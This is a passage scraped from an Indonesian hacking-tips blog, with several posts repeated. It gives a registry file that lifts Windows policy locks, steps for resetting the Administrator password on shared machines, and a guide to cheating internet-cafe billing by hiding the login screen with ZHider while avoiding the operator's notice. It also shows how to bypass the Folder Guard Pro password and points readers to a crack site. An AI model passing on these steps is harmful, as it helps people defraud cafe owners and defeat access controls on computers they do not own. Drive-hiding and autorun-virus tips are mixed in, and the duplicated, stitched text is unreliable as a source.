"NoNetSetup"=dword:00000000
"NoNetSetupIDPage"=dword:00000000
"NoNetSetupSecurityPage"=dword:00000000
"NoEntireNetwork"=dword:00000000
"NoWorkgroupContents"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp]
"NoRealMode"=dword:00000000
"Disable"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop]
"NoHTMLWallPaper"=dword:00000000
"NoChangingWallPaper"=dword:00000000
"NoCloseDragDropBands"=dword:00000000
"NoMovingBands"=dword:00000000
"NoAddingComponents"=dword:00000000
"NoDeletingComponents"=dword:00000000
"NoEditingComponents"=dword:00000000
"NoClosingComponents"=dword:00000000
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoFolderOptions"=dword:00000000
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableCMD"=dword:00000000
"DisableRegistryTools"=dword:00000000
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Advanced]
"Hidden"=dword:00000000
"HideFileExt"=dword:00000000
"ShowSuperHidden"=dword:00000000
------------------------------------------- end --------------------------------------------
==> Setelah regedit.exe terbuka baru ubah password administrator <-- (Ini yang di tunggu2x)
caranya:
C:\Windows\System32\compmgmt.msc <-- double Click
------------------------------------------ start. ------------------------------------------
Pilih: - Computer Management (Local)/System Tools/Local Users and Groups/User
- Klik kanan Administrator -> Set Password
- Ketik New Password: **********
Confirm Password: **********
--------------------------------------- Bonus - Bonus ---------------------------------------
Jika tidak bisa sama sekali klik kanan di Windows Explorer masih ada trik tertentu
caranya:
- Masuk ke Folder misalnya: C:/Windows/System32
- Trus klik salah satu file dalam folder itu
misalnya: TaskMgr.exe
- Kemudian klik menu File pada Win Explorer
- Run as...
- Klik The following user -> Masukkan passwordnya
Username: Administrator
Password: ********
- Selesai
NB: Cara ini dilakukan jika kita sudah mendapatkan password administrator seperti yang telah
kita pelajari di atas. jika semua cara di atas masih ngga bisa jg berarti masih ada cara
lain silakan anda temukan sendiri, selamat mencoba
Contoh lain2nya dibawah ini...........
1. Membuka MSConfig dari Windows Explorer
Caranya:
C:\WINDOWS\pchealth\helpctr\binaries\MSConfig.exe
2. Membuka Sysedit dari Windows Explorer
Caranya:
C:\Windows\System32\Sysedit.exe
3. Membuka Task Manager
Caranya:
C:\Windows\System32\taskmgr.exe
4. Membuka Services.msc
Caranya:
C:\Windows\System32\services.msc
5. Membuka Disk Management System (Melihat Partisi Harddisk)
Caranya:
C:\Windows\System32\diskmgmt.msc
6. Membuka Computer Management Services
Caranya:
C:\Windows\System32\compmgmt.msc
7. Membuka Shortcut to desktop
Caranya:
C:\Windows\System32\Show Desktop
8. Membuka Defragment
Caranya
C:\Windows\System32\dfrg.msc
Read More..
Win +E, membuka run: Win +R, mencari file di dalam harddisk Win +F, yang mana tombol Win terletak antara
tombol Ctrl dan tombol alt. ingin tahu caranya...nih silakan coba...
Sebenarnya cara ini telah lama saya coba dan ternyata berhasil (praktek di komputer sendiri dan beberapa warnet yang menggunakan billing explorer) Mohon maaf kepada pembuat Billing Explorer...untuk tidak berpanjang lebar langsung aja ya...
Pertama Buka GPEdit.msc dulu
caranya:
C:\Windows\System32\GPEdit.msc <-- double Click
1. Jika Klik Kanan di Desktop tidak bisa
Masuk Ke GPEdit.msc
Masuk ke [User Configuration/Administrative Templates/Desktop]
- Disable (Hide and disable all items on the desktop)
Jika MyComputer tidak ada
- Disable (Remove My Computer icon on the Desktop)
2. Jika Ingin mengubah properties pada taskbar start menu
masuk ke [User Configuration/Administrative Templates/Start Menu and Taskbar]
- Disable (Prevent changes to Taskbar and Start Menu Settings)
Jika Menu Run tidak muncul
- Disable (Remove Run menu from Start Menu)
Jika menu pada taskbar saat klik kanan tidak muncul
- Disable (Remove access to the context menus for the taskbar)
3. Apabila Control Panel tidak bisa di akses
Masuk ke [User Configuration/Administrative Templates/Control Panel]
- Disable (Prohibit access to the Control Panel)
4. Jika Command Prompt tidak bisa di akses
Masuk ke [User Configuration/Administrative Templates/System]
- Disable (Prevent access to the command prompt)
Jika Registry Editor tidak bisa di akses
- Disable (Prevent access to registry editing tools)
5. Jika Task Manager tidak bisa di akses
Masuk ke [User Configuration/Administrative Templates/System/Ctrl+Alt+Del Options]
- Disable (Remove Task Manager)
6. Jika Folder Options pada Windows Explorer tidak muncul
Masuk ke [User Configuration/Administrative Templates/Windows Component/Windows Explorer]
- Disable (Remove these Folder Options menu item from the Tools menu)
Jika Windows Key tidak berfungsi
- Disable (Turn off Windows+X hotkeys)
------------------------------------------- end --------------------------------------------
--------------------------------------- Regedit. ---------------------------------------
==> Setelah GPEdit.msc terbuka baru buka Registry Tools
caranya:
C:\Windows\System32\regedit.exe <-- double Click
--- atau ---
C:\Windows\regedit.exe <-- double Click
------------------------------------------ start. ------------------------------------------
Regedit 4
[HKEY_LOCAL_MACHINE\Software\ResearchMachines\NOATTRIB.VXD]
"loadvxd"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDrives"=dword:00000000
"LinkResolveIgnoreLinkInfo"=dword:00000000
"NoFolderOptions"=dword:00000000
"ClearRecentDocsOnExit"=dword:00000000
"NoTrayContextMenu"=dword:00000000
"EnforceShellExtensionSecurity"=dword:00000000
"NoPrinterTabs"=dword:00000000
"NoDeletePrinter"=dword:00000000
"NoAddPrinter"=dword:00000000
"NoRun"=dword:00000000
"NoSetFolders"=dword:00000000
"NoSetTaskbar"=dword:00000000
"NoClose"=dword:00000000
"NoViewContextMenu"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000
"NoDispScrSavPage"=dword:00000000
"NoDispAppearancePage"=dword:00000000
"NoDispSettingsPage"=dword:00000000
"NoAdminPage"=dword:00000000
"NoProfilePage"=dword:00000000
"NoDevMgrPage"=dword:00000000
"NoConfigPage"=dword:0000000
"NoFileSysPage"=dword:00000000
"NoDispCPL"=dword:00000000
"NoDispBackgroundPage"=dword:00000000
"NoVirtMemPage"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network]
"NoFileSharingControl"=dword:00000000
"NoPrintSharingControl"=dword:00000000
"NoNetSetup"=dword:00000000
"NoNetSetupIDPage"=dword:00000000
"NoNetSetupSecurityPage"=dword:00000000
"NoEntireNetwork"=dword:00000000
"NoWorkgroupContents"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp]
"NoRealMode"=dword:00000000
"Disable"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop]
"NoHTMLWallPaper"=dword:00000000
"NoChangingWallPaper"=dword:00000000
"NoCloseDragDropBands"=dword:00000000
"NoMovingBands"=dword:00000000
"NoAddingComponents"=dword:00000000
"NoDeletingComponents"=dword:00000000
"NoEditingComponents"=dword:00000000
"NoClosingComponents"=dword:00000000
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoFolderOptions"=dword:00000000
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableCMD"=dword:00000000
"DisableRegistryTools"=dword:00000000
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Advanced]
"Hidden"=dword:00000000
"HideFileExt"=dword:00000000
"ShowSuperHidden"=dword:00000000
------------------------------------------- end --------------------------------------------
==> Setelah regedit.exe terbuka baru ubah password administrator <-- (Ini yang di tunggu2x)
caranya:
C:\Windows\System32\compmgmt.msc <-- double Click
------------------------------------------ start. ------------------------------------------
Pilih: - Computer Management (Local)/System Tools/Local Users and Groups/User
- Klik kanan Administrator -> Set Password
- Ketik New Password: **********
Confirm Password: **********
--------------------------------------- Bonus - Bonus ---------------------------------------
Jika tidak bisa sama sekali klik kanan di Windows Explorer masih ada trik tertentu
caranya:
- Masuk ke Folder misalnya: C:/Windows/System32
- Trus klik salah satu file dalam folder itu
misalnya: TaskMgr.exe
- Kemudian klik menu File pada Win Explorer
- Run as...
- Klik The following user -> Masukkan passwordnya
Username: Administrator
Password: ********
- Selesai
NB: Cara ini dilakukan jika kita sudah mendapatkan password administrator seperti yang telah
kita pelajari di atas. jika semua cara di atas masih ngga bisa jg berarti masih ada cara
lain silakan anda temukan sendiri, selamat mencoba
Contoh lain2nya dibawah ini...........
1. Membuka MSConfig dari Windows Explorer
Caranya:
C:\WINDOWS\pchealth\helpctr\binaries\MSConfig.exe
2. Membuka Sysedit dari Windows Explorer
Caranya:
C:\Windows\System32\Sysedit.exe
3. Membuka Task Manager
Caranya:
C:\Windows\System32\taskmgr.exe
4. Membuka Services.msc
Caranya:
C:\Windows\System32\services.msc
5. Membuka Disk Management System (Melihat Partisi Harddisk)
Caranya:
C:\Windows\System32\diskmgmt.msc
6. Membuka Computer Management Services
Caranya:
C:\Windows\System32\compmgmt.msc
7. Membuka Shortcut to desktop
Caranya:
C:\Windows\System32\Show Desktop
8. Membuka Defragment
Caranya
C:\Windows\System32\dfrg.msc
Read More..
Menyembunyikan Drive di PC
sebenernya ga ada persipan khusus buat ngilangin drive di PC km, cuma ngerubah registry aja kok, berarti yang kamu butuhkan just only PC yang pake OS Win XP (all SP) n Win ME, (kalo di 98 blm dicoba). itu aja......
Nah skr ikutin langkah2 nya:
1. Klik tombol START trus lo pilih RUN di jendela RUN tadi itu lo ketik "Regedit" (gak pake tanda kutip)
2. Nah skr lo dah di jendela Registry Editor, trus cari HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
3. Buka folder EXPLORER tadi, trus klik kanan di area kosong di panel bagian kanan, klik NEW trus klik DWORD Value, trus beri nama NoDrives
4. klik ganda NoDrives tadi, trus ubah angka di value data nya sesuai dgn drive mana yg mau lo ilangin, ni angka bwt ngilangin drive nya:
Drive A = 1 Drive H = 128 Ngilangin semua drive = 67108863
Drive B = 2 Drive I = 256
Drive C = 4 Drive J = 512
Drive D = 8 Drive K = 1024
Drive E = 16 Drive L = 2048
Drive F = 32 Drive M = 4096
Drive G = 64 Drive N = 8192
5. kalo udah, close registry editornya trus restart PC nya...!!
6. kalo udah lo restart buka My Computer trus liat, ga ada kan drive yang dah lo ilangin tadi....
7. tenang aja semua data yang ada di drive tadi aman kok.....suerrr!!!!
==============================================
CARA NGEMBALIIN KE SEPERTI SEMULA:
1. ikuti langkah diatas (no 1 ampe no 2) yach!!!!!
2. Buka folder EXPLORER nya, trus cari NoDrives nya
3. Nah di jendela NoDrives, rubah Value Data yang tadinya 4 (misal: untuk drive C) atau angka drive yang dah lo masukin, trus ganti jadi 0 (nol), atau hapus aja langsung nama file NoDrives tadi
4. Restart tuch PC, and than liat aja di my computer drive yang diilangin tadi pasti udah ada......
Read More..
Nah skr ikutin langkah2 nya:
1. Klik tombol START trus lo pilih RUN di jendela RUN tadi itu lo ketik "Regedit" (gak pake tanda kutip)
2. Nah skr lo dah di jendela Registry Editor, trus cari HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
3. Buka folder EXPLORER tadi, trus klik kanan di area kosong di panel bagian kanan, klik NEW trus klik DWORD Value, trus beri nama NoDrives
4. klik ganda NoDrives tadi, trus ubah angka di value data nya sesuai dgn drive mana yg mau lo ilangin, ni angka bwt ngilangin drive nya:
Drive A = 1 Drive H = 128 Ngilangin semua drive = 67108863
Drive B = 2 Drive I = 256
Drive C = 4 Drive J = 512
Drive D = 8 Drive K = 1024
Drive E = 16 Drive L = 2048
Drive F = 32 Drive M = 4096
Drive G = 64 Drive N = 8192
5. kalo udah, close registry editornya trus restart PC nya...!!
6. kalo udah lo restart buka My Computer trus liat, ga ada kan drive yang dah lo ilangin tadi....
7. tenang aja semua data yang ada di drive tadi aman kok.....suerrr!!!!
==============================================
CARA NGEMBALIIN KE SEPERTI SEMULA:
1. ikuti langkah diatas (no 1 ampe no 2) yach!!!!!
2. Buka folder EXPLORER nya, trus cari NoDrives nya
3. Nah di jendela NoDrives, rubah Value Data yang tadinya 4 (misal: untuk drive C) atau angka drive yang dah lo masukin, trus ganti jadi 0 (nol), atau hapus aja langsung nama file NoDrives tadi
4. Restart tuch PC, and than liat aja di my computer drive yang diilangin tadi pasti udah ada......
Read More..
Mencurangi (hampir) Semua Jenis Billing Warnet
Artikel ini dibuat oleh seorang newbie dan lamer bernama Blizbs_Uchiha dan ditujukan oleh newbie2 laennya. Buat mas-mas dan om-om yang merasa udah merasa pinter ato udah tau caranya sangat disarankan untuk tidak usah membaca artikel ini karena hanya membuang2 waktu anda yang sangat berharga.
Cara ini saya dapetin pas kantong lagi kempes tapi nafsu online lagi tinggi
Setelah muter2 otak sebentar sambil tidur, akhirnya kutemukan cara buat ngakalin billing warnetnya buat ngirit ongkos online.
Kalau cara yang ada di X-Code Magz vol4 itu cuma bisa untuk Billing Explorer(memang bisa, saya sudah membuktikannya)
Cara ini berlaku untuk segala versi billing explorer dan kebanyakan aplikasi billing lainnya. Dan merupakan kelemahan semua billing warnet yang berbasis windows!!!
Penasaran mau tau caranya ? Baca aja sampai habis !
Skali lagi saya ingatkan buat anda yang merasa udah pinter diharapa ga usah baca, kecuali pengen mati kebosanan (niru kata-kata siapa ya?
Ini dia caranya ...
Saat kita mulai menyalakan komputer di warnet yang pertama muncul saat windows dimulai adalah login screen client billing yang menutupi seluruh area windows. Fungsi Alt+Tab dan Ctrl+Alt+Del biasanya ikut-ikutan di-disable untuk memaksa kita login melalui program billing itu.
Sebenarnya saat kita menghadapi login screen itu komputer sudah siap dijalankan. Hanya terhalang oleh screen login yang menyebalkan itu. Naah... udah tau apa yang bakal saya jelasin ? Kalo udah tau, brenti aja bacanya. Daripada mati kebosanan
Yess.. betul sekali. Yang perlu kita lakukan hanyalah menyembunyikan jendela login itu tanpa perlu login. Ada banyak progie buat nyembunyiin window, salah satunya ZHider. Saya hanya akan menjelaskan penggunaan ZHider. Bagi yang menggunakan progie laen silakan baca manualnya, tapi yang perlu diperhatikan adalah progie yang anda gunakan harus bisa show/hide window pake hotkey coz windows kita kan ditutupi sama login screen sialan itu.
Yang harus disiapkan:
1. Program ZHider. Cari sendiri pake om google. Ukurannya kecil kok, ga sampe setengah isi disket.
Langkah-langkahnya:
01. Masuk warnet dan pasang muka bego biar ga dicurigai operator
02. Pastikan selain box/bilik yang kita tempati masih ada box lain yang kosong. Biar ga dicurigai juga sih.
03. Usahakan cari tempat yang jauh dari op, supaya ga ketahuan box kamu kosong apa nggak.
04. Nyalakan kompi dihadapan anda bila masih dalam keadaan mati.
05. Saat masuk login screen, login aja seperti biasa.
06. Jalankan ZHider yang sudah disiapkan di disket/flashdisk. Kalo belom ada, cari aja pake google.
07. Setelah ZHider dijalankan langsung aja logout.
08. Naah, di login screen ini kita mulai aksi mendebarkan kita. Tekan Ctrl+Alt+Z.. Jreeeng, login screen telah menghilang !!!
09. Browsinglah sepuasnya, tapi tetap pastikan ada box lain yang kosong. Kan aneh kalau ada yang masuk warnet, dia lihat udah penuh. Padahal di billing server kelihatan masih ada yang belum login.
10. Kalo sudah puass tekan Ctrl+Alt+x untuk memunculkan kembali login screen yang menghilang entah kemana
11. Login seperti biasa dan browsing beberapa menit sampai penunjuk tarif sampai ke angka yang kita kehendaki. Ini supaya ga dicurigai.
12. Logout. SIapkan muka bego, lalu bayar tarif.
Cara ini lebih mudah dilalukan bila si operator ga terlalu kenal sama kamu. Apalagi bila si op sering keluyuran.
Ini beberapa hotkey ZHider yang bisa digunakan, untuk hotkey lainnya silakan baca file readme yang disertakan bersama zhider
CTRL+ALT+Z Menyembunyikan jendela aktif
CTRL+ALT+X Menampilkan kembali semua jendela yang disembunyikan
CTRL+ALT+L Menampilkan dialog zhider
CTRL+ALT+M Menampilkan kembali semua jendela yang disembunyikan, dan juga menutup zhider.
Read More..
Cara ini saya dapetin pas kantong lagi kempes tapi nafsu online lagi tinggi
Setelah muter2 otak sebentar sambil tidur, akhirnya kutemukan cara buat ngakalin billing warnetnya buat ngirit ongkos online.
Kalau cara yang ada di X-Code Magz vol4 itu cuma bisa untuk Billing Explorer(memang bisa, saya sudah membuktikannya)
Cara ini berlaku untuk segala versi billing explorer dan kebanyakan aplikasi billing lainnya. Dan merupakan kelemahan semua billing warnet yang berbasis windows!!!
Penasaran mau tau caranya ? Baca aja sampai habis !
Skali lagi saya ingatkan buat anda yang merasa udah pinter diharapa ga usah baca, kecuali pengen mati kebosanan (niru kata-kata siapa ya?
Ini dia caranya ...
Saat kita mulai menyalakan komputer di warnet yang pertama muncul saat windows dimulai adalah login screen client billing yang menutupi seluruh area windows. Fungsi Alt+Tab dan Ctrl+Alt+Del biasanya ikut-ikutan di-disable untuk memaksa kita login melalui program billing itu.
Sebenarnya saat kita menghadapi login screen itu komputer sudah siap dijalankan. Hanya terhalang oleh screen login yang menyebalkan itu. Naah... udah tau apa yang bakal saya jelasin ? Kalo udah tau, brenti aja bacanya. Daripada mati kebosanan
Yess.. betul sekali. Yang perlu kita lakukan hanyalah menyembunyikan jendela login itu tanpa perlu login. Ada banyak progie buat nyembunyiin window, salah satunya ZHider. Saya hanya akan menjelaskan penggunaan ZHider. Bagi yang menggunakan progie laen silakan baca manualnya, tapi yang perlu diperhatikan adalah progie yang anda gunakan harus bisa show/hide window pake hotkey coz windows kita kan ditutupi sama login screen sialan itu.
Yang harus disiapkan:
1. Program ZHider. Cari sendiri pake om google. Ukurannya kecil kok, ga sampe setengah isi disket.
Langkah-langkahnya:
01. Masuk warnet dan pasang muka bego biar ga dicurigai operator
02. Pastikan selain box/bilik yang kita tempati masih ada box lain yang kosong. Biar ga dicurigai juga sih.
03. Usahakan cari tempat yang jauh dari op, supaya ga ketahuan box kamu kosong apa nggak.
04. Nyalakan kompi dihadapan anda bila masih dalam keadaan mati.
05. Saat masuk login screen, login aja seperti biasa.
06. Jalankan ZHider yang sudah disiapkan di disket/flashdisk. Kalo belom ada, cari aja pake google.
07. Setelah ZHider dijalankan langsung aja logout.
08. Naah, di login screen ini kita mulai aksi mendebarkan kita. Tekan Ctrl+Alt+Z.. Jreeeng, login screen telah menghilang !!!
09. Browsinglah sepuasnya, tapi tetap pastikan ada box lain yang kosong. Kan aneh kalau ada yang masuk warnet, dia lihat udah penuh. Padahal di billing server kelihatan masih ada yang belum login.
10. Kalo sudah puass tekan Ctrl+Alt+x untuk memunculkan kembali login screen yang menghilang entah kemana
11. Login seperti biasa dan browsing beberapa menit sampai penunjuk tarif sampai ke angka yang kita kehendaki. Ini supaya ga dicurigai.
12. Logout. SIapkan muka bego, lalu bayar tarif.
Cara ini lebih mudah dilalukan bila si operator ga terlalu kenal sama kamu. Apalagi bila si op sering keluyuran.
Ini beberapa hotkey ZHider yang bisa digunakan, untuk hotkey lainnya silakan baca file readme yang disertakan bersama zhider
CTRL+ALT+Z Menyembunyikan jendela aktif
CTRL+ALT+X Menampilkan kembali semua jendela yang disembunyikan
CTRL+ALT+L Menampilkan dialog zhider
CTRL+ALT+M Menampilkan kembali semua jendela yang disembunyikan, dan juga menutup zhider.
Read More..
Menjebol Password FOLDER GUARD Pro 5.2
Keamanan memang sangat penting melihat perkembangan teknologi informasi yang demikian pesat sekarang ini, namun teknologi kejahatan saat ini masih lebih unggul satu tingkat dibanding dengan pencegahannya. Tapi itu tidak menjadi landasan untuk kita bisa terus mengikuti perkembangan Teknologi security yang mungkin akan lebih maju.
Mungkin Anda pernah mendengar salah satu tools proteksi berbasis windows yang sangat terkenal yaitu FOLDER GUARD, versi terbarunya FOLDER GUARD PRO 5.3, untuk FOLDER GUARD PRO 5.2 bisa Anda cari di www.google.com, & dan cracknya di http://paulyoung.yeah.net.
Software ini memang dibilang sangat handal dibanding dengan software proteksi lainya , karena bisa menghiddenkan subkey yang berhubungan dengan system folder guard tersebut, sehingga akan membuat kita kesulitan untuk melihat sejauh mana sistem tersebut. Tapi perlu diketahui banyak software proteksi yang memberikan fitur-fitur praktis, sehingga akan memudahkan penggunanya dan akan mengundang adanya hole pada software itu sendiri, Contohnya FOLDER GUARD PRO 5.2.
Sewaktu kita instalasi software ini, kita akan diminta untuk mengeset apa yang perlu diproteksi, apakah folder atau sistem, baru kita akan diminta untuk memasukan password Administrator dan Master dan setelah itu di save.
Password Administrator berfungsi untuk kita menjalankan folder Guard, sedangkan password Master berfungsi untuk menjalankan Toggle protection sehingga proteksi proteksi folder guard bisa dibikin enabled atau disabled secara cepat tanpa perlu konfigurasi.
Nah biasanya setelah kita instalasi folder guard dia akan membuat folder di directory windows\desktop\Folder Guard. Mungkin Anda sudah nggak sabar denger ocehan saya. Sekarang coba anda klik file Reset password yang ada di \windows\desktop\Folder Guard. Setelah itu Anda akan diminta Mengisi form registrasi pertama kalian, sebelumnya saya ingatkan anda diminta mencari dulu crack buat folder guard pro 5.2 setelah itu isi form registrasi harus sama dengan yang anda isi sewaktu instalasi pertama. Nah dengan cara tersebut diatas kita akan masuk ke folder guard tanpa password.
Â
Â
Tapi yang menjadi masalah jika posisi kita diwarnet atau di kantor yang menggunakan software folder guard , tentunya kita masukin username serta registrasi code kita dg menggunakan software Cracking folder guard pro 5.2, hal itu tidak akan berhasil Karena dia akan meminta user name registrasi serta codenya sewaktu install pertama bukan registrasi code yang baru.
Sekarang bagaimana kalau di warnet atau kantor mudah saja, coba Anda copykan file Fgkey.exe, Fguard32.dll, Fguard.vxd dari komputer Anda yang ada didirektory \Program Files\WinAbility\Folder Guard\ kedalam disket, kalau sudah klik tombol start trus run, ketik regedit kalau regedit dikunci Anda import aja file .reg yang berisikan disabled registry tools dari disket Anda lalu klik kanan, kalau sudah masuk ke subkey \HKEY_LOCAL_MACHINE\Software\Winability\Folder Guard\Setup\1, setelah itu delete key yang name valuenya info.
Sekarang buat shortcut untuk file fgkey.exe yang ada di drive A, trus tambahkan options / pw,pada command line “A:\fgkey†/pw , isi nama shortcutnya dengan reset.
Â
lalu kalian klik shortcut reset tersebut kemudian klik continue pada form registrasi, jika keluar message “The Administrator's Password For Folder Guard has been reset†berarti Selamat anda telah berhasil menembus password administrator folder guard pro 5.2. Perlu diketahui cara ini juga sudah saya coba pada Folder Guard pro 5.3 yang terbaru dan berhasil, sekarang coba jalankan program folder guardnya, kalian masuk tanpa password setelah itu kalian bisa rubah setting proteksinya sekaligus mengganti passwordnya eh nggak boleh jahat. Artikel ini saya buat untuk tujuan security, sehingga para pemilik warnet bisa lebih hati-hati & waspada dalam hal proteksi sistem.
Read More..
Mungkin Anda pernah mendengar salah satu tools proteksi berbasis windows yang sangat terkenal yaitu FOLDER GUARD, versi terbarunya FOLDER GUARD PRO 5.3, untuk FOLDER GUARD PRO 5.2 bisa Anda cari di www.google.com, & dan cracknya di http://paulyoung.yeah.net.
Software ini memang dibilang sangat handal dibanding dengan software proteksi lainya , karena bisa menghiddenkan subkey yang berhubungan dengan system folder guard tersebut, sehingga akan membuat kita kesulitan untuk melihat sejauh mana sistem tersebut. Tapi perlu diketahui banyak software proteksi yang memberikan fitur-fitur praktis, sehingga akan memudahkan penggunanya dan akan mengundang adanya hole pada software itu sendiri, Contohnya FOLDER GUARD PRO 5.2.
Sewaktu kita instalasi software ini, kita akan diminta untuk mengeset apa yang perlu diproteksi, apakah folder atau sistem, baru kita akan diminta untuk memasukan password Administrator dan Master dan setelah itu di save.
Password Administrator berfungsi untuk kita menjalankan folder Guard, sedangkan password Master berfungsi untuk menjalankan Toggle protection sehingga proteksi proteksi folder guard bisa dibikin enabled atau disabled secara cepat tanpa perlu konfigurasi.
Nah biasanya setelah kita instalasi folder guard dia akan membuat folder di directory windows\desktop\Folder Guard. Mungkin Anda sudah nggak sabar denger ocehan saya. Sekarang coba anda klik file Reset password yang ada di \windows\desktop\Folder Guard. Setelah itu Anda akan diminta Mengisi form registrasi pertama kalian, sebelumnya saya ingatkan anda diminta mencari dulu crack buat folder guard pro 5.2 setelah itu isi form registrasi harus sama dengan yang anda isi sewaktu instalasi pertama. Nah dengan cara tersebut diatas kita akan masuk ke folder guard tanpa password.
Â
Â
Tapi yang menjadi masalah jika posisi kita diwarnet atau di kantor yang menggunakan software folder guard , tentunya kita masukin username serta registrasi code kita dg menggunakan software Cracking folder guard pro 5.2, hal itu tidak akan berhasil Karena dia akan meminta user name registrasi serta codenya sewaktu install pertama bukan registrasi code yang baru.
Sekarang bagaimana kalau di warnet atau kantor mudah saja, coba Anda copykan file Fgkey.exe, Fguard32.dll, Fguard.vxd dari komputer Anda yang ada didirektory \Program Files\WinAbility\Folder Guard\ kedalam disket, kalau sudah klik tombol start trus run, ketik regedit kalau regedit dikunci Anda import aja file .reg yang berisikan disabled registry tools dari disket Anda lalu klik kanan, kalau sudah masuk ke subkey \HKEY_LOCAL_MACHINE\Software\Winability\Folder Guard\Setup\1, setelah itu delete key yang name valuenya info.
Sekarang buat shortcut untuk file fgkey.exe yang ada di drive A, trus tambahkan options / pw,pada command line “A:\fgkey†/pw , isi nama shortcutnya dengan reset.
Â
lalu kalian klik shortcut reset tersebut kemudian klik continue pada form registrasi, jika keluar message “The Administrator's Password For Folder Guard has been reset†berarti Selamat anda telah berhasil menembus password administrator folder guard pro 5.2. Perlu diketahui cara ini juga sudah saya coba pada Folder Guard pro 5.3 yang terbaru dan berhasil, sekarang coba jalankan program folder guardnya, kalian masuk tanpa password setelah itu kalian bisa rubah setting proteksinya sekaligus mengganti passwordnya eh nggak boleh jahat. Artikel ini saya buat untuk tujuan security, sehingga para pemilik warnet bisa lebih hati-hati & waspada dalam hal proteksi sistem.
Read More..
Membuat flashdisk aman dari autorun-nya si-virus
Baiklah saya akan mulai membahasnya sekarang, diawali dengan cara penularan virus lewat media flashdisk. Sebenarnya sangat simple, ketika flashdisk dicolokan kedalam port usb virus yang sedang berjalan tinggal men-copy dirinya sendiri ke dalam flashdisk, dan tidak lupa pula dengan membuat file “autorun.inf” yang letak file-nya kasat mata sehingga tidak dapat dilihat. nah… file inilah yang akan kita edit agar virusnya tidak dapat menjalankan dirinya di komputer kita.
Cara yang pertama dengan mengedit secara manual dengan menggunakan notepad atau wordpad. Diasumsikan flashdisk kita yang telah dicolokan kedalam komputer (yang telah terinfeksi) beralamat “F:\”, maka saya akan mencoba membuka file “F:\autorun.inf” lalu enter. Lalu notepad akan terbuka secara otomatis, setelah itu kita tinggal mengedit dengan memblock semua (ctrl+a) lalu hapus(backspace atau del) lalu anda bisa membiarkannya kosong lalu tekan ctrl+s untuk men-savenya.
Tetapi bang blckflcn, bagaimana jika file tersebut memiliki attribute “read-only”? yang jelas kita tidak dapat mengeditnya secara manual!(aaaaarrrrrgh!!!!). Lalu? Apa yang dapat kita lakukan… bang blckflcn?
Caranya :
1)buka aplikasi notepad (tempat dimana kita akan menulis script)
2)tuliskan script “del /a:r f:\autorun.inf” (tnp tanda petik) lalu enter.
3)langkah selajutnya adalah tulis script lagi! script nya “echo ‘terserah tulisan apa’ >f:\autorun.inf&attrib +r f:\autorun.inf” (tnp tanda petik juga).
4)lalu save file script tersebut dengan nama file terserah anda dan path-nya terserah anda juga, tetapi extension-nya harus “.bat”(harus tidak boleh tidak)
5)lalu jalankan file script yang baru kita buat tersebut
6)buka explorer
7)pada bagian address tuliskan “F:\autorun.inf”, lalu tekan enter
Setelah beberapa step tadi, virus tidak dapat menjalankan dirinya di komputer lain ketika kita mencolokan flashdisk kita kedalam port usb-nya. Tetapi bang blckflcn, virus2 dari komputer yang terinfeksi tersebut masih ada di dalam flashdisk saya. Bagaimana ini? Yah, itu sih bukan tugas saya lagi. Itu sih sudah menjadi tugas anti-virus… saya hanya memberitahukan cara agar virusnya tidak berjalan ketika flashdisk kita dicolokan kedalam port usb pada komputer yang lain… lagian mantra yang saya punya masih belum begitu ampuh untuk membuat virus tidak berjalan di komputer. Oleh karena itu, saya akan belajar tentang mantra2 tersebut di hogwarts agar lebih ampuh.
Read More..
Cara yang pertama dengan mengedit secara manual dengan menggunakan notepad atau wordpad. Diasumsikan flashdisk kita yang telah dicolokan kedalam komputer (yang telah terinfeksi) beralamat “F:\”, maka saya akan mencoba membuka file “F:\autorun.inf” lalu enter. Lalu notepad akan terbuka secara otomatis, setelah itu kita tinggal mengedit dengan memblock semua (ctrl+a) lalu hapus(backspace atau del) lalu anda bisa membiarkannya kosong lalu tekan ctrl+s untuk men-savenya.
Tetapi bang blckflcn, bagaimana jika file tersebut memiliki attribute “read-only”? yang jelas kita tidak dapat mengeditnya secara manual!(aaaaarrrrrgh!!!!). Lalu? Apa yang dapat kita lakukan… bang blckflcn?
Caranya :
1)buka aplikasi notepad (tempat dimana kita akan menulis script)
2)tuliskan script “del /a:r f:\autorun.inf” (tnp tanda petik) lalu enter.
3)langkah selajutnya adalah tulis script lagi! script nya “echo ‘terserah tulisan apa’ >f:\autorun.inf&attrib +r f:\autorun.inf” (tnp tanda petik juga).
4)lalu save file script tersebut dengan nama file terserah anda dan path-nya terserah anda juga, tetapi extension-nya harus “.bat”(harus tidak boleh tidak)
5)lalu jalankan file script yang baru kita buat tersebut
6)buka explorer
7)pada bagian address tuliskan “F:\autorun.inf”, lalu tekan enter
